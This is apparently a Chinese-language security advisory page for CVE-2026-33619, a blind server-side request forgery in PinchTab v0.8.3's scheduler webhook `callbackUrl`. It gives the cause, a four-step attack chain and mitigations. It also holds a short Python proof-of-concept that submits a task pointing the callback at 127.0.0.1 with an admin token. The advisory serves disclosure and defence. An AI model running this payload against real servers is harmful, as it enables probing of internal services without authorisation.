CVE-2026-33619 CVSS 4.1 中危

CVE-2026-33619 PinchTab服务端请求伪造漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33619

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

4.1 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PinchTab

漏洞概述

PinchTab v0.8.3版本的可选调度器Webhook功能存在服务器端请求伪造（SSRF）漏洞。由于系统在处理`POST /tasks`接口提交的`callbackUrl`参数时，仅校验URL协议而未限制目标IP范围，且允许HTTP重定向，攻击者若拥有管理员Token，可诱导服务器向内网地址（如127.0.0.1）发送请求。虽然该功能默认关闭，但一旦启用，攻击者可利用此盲SSRF探测内网服务或利用服务器网络位置发起攻击。

技术细节

该漏洞位于PinchTab的调度器Webhook交付模块中。在v0.8.3版本，当用户通过`POST /tasks`提交任务并附带`callbackUrl`时，服务器会在任务结束状态时向该URL发送POST请求。漏洞成因在于服务器端仅验证了URL的Scheme（http/https），未实施IP地址白名单或黑名单机制，导致允许访问Loopback、私有及链路本地地址。同时，由于使用了默认的HTTP客户端行为，系统会自动跟随30x重定向，且未将请求固定在初始验证的IP上。利用此漏洞需要攻击者具备服务器的Master API Token（通常代表管理员权限）。攻击者可通过构造恶意的回调地址，利用PinchTab服务器作为跳板，对服务器后端内网可达的HTTP(S)服务进行扫描或数据交互，造成信息泄露或内部系统受损。

攻击链分析

STEP 1

信息收集

攻击者识别目标是否运行PinchTab服务，并确认调度器功能是否开启。

STEP 2

获取凭证

攻击者获取PinchTab的Master API Token，该Token是提交任务所必须的认证凭证。

STEP 3

提交恶意任务

攻击者向`/tasks`接口发送POST请求，在`callbackUrl`字段中填入内网地址（如http://127.0.0.1/admin）。

STEP 4

触发SSRF

当任务状态变更时，服务器向`callbackUrl`发起HTTP请求，导致服务器向内网目标发送数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit for CVE-2026-33619
# Target: PinchTab v0.8.3
# Description: Triggers SSRF by submitting a task with a malicious callback URL.

target_url = "http://target-ip:port/tasks"
master_token = "YOUR_MASTER_API_TOKEN" # Requires Admin Privileges
internal_target = "http://127.0.0.1:22" # Example: Targeting local SSH port_banner or internal service

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {master_token}"
}

payload = {
    "callbackUrl": internal_target,
    "taskData": "example_task_payload"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200 or response.status_code == 201:
        print("[+] Task submitted successfully. SSRF payload triggered.")
    else:
        print(f"[-] Failed to submit task. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

PinchTab v0.8.3

防御指南

临时缓解措施

在未升级版本前，建议用户禁用可选的调度器功能以阻断攻击面。同时，应严格保护管理员API Token，防止未授权访问提交任务接口。此外，可在网络层面配置出站防火墙规则，限制PinchTab服务器仅能向必要的公网地址发起连接，阻断向内网IP段（如127.0.0.0/8, 192.168.0.0/16）的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表